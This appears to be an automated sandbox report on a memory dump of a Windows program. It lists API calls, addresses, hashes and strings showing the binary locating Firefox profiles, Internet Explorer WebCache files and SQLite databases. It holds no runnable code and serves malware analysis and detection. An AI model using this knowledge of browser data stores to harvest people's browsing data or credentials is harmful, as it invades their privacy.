                                                                                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                  • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                                                  • memset.MSVCRT ref: 00404020
                                                                                                                  • memset.MSVCRT ref: 00404035
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                  • API String ID: 4039892925-3369679110
                                                                                                                  • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                  • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                                                  • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                  • String ID: $0.@
                                                                                                                  • API String ID: 2758756878-1896041820
                                                                                                                  • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                  • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2941347001-0
                                                                                                                  • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                  • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                                                  • memset.MSVCRT ref: 00403C1E
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                  • API String ID: 1534475566-1174173950
                                                                                                                  • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                  • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                  Strings
                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                  • API String ID: 71295984-2036018995
                                                                                                                  • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                  • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                  APIs
                                                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                  • String ID: "%s"
                                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                                  • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                  • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                  • memset.MSVCRT ref: 00408828
                                                                                                                  • memset.MSVCRT ref: 00408840
                                                                                                                  • memset.MSVCRT ref: 00408858
                                                                                                                  • memset.MSVCRT ref: 00408870
                                                                                                                  • memset.MSVCRT ref: 00408888
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2911713577-0
                                                                                                                  • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                  • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                  APIs
                                                                                                                  • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                  • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                  • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp
                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                  • API String ID: 1475443563-3708268960
                                                                                                                  • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                  • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmpqsort
                                                                                                                  • String ID: /nosort$/sort
                                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                                  • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                  • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                  Strings
                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                  • API String ID: 2887208581-2114579845
                                                                                                                  • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                  • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                  APIs
                                                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3473537107-0
                                                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(022A0048), ref: 0044DF01
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(022B0050), ref: 0044DF11
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00C86DA8), ref: 0044DF21
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(022B0458), ref: 0044DF31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@DeleteObject
                                                                                                                  • String ID: r!A
                                                                                                                  APIs
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                  • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$memcmp
                                                                                                                  • String ID: $$8
                                                                                                                  Strings
                                                                                                                  • too many columns on %s, xrefs: 00430763
                                                                                                                  • duplicate column name: %s, xrefs: 004307FE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
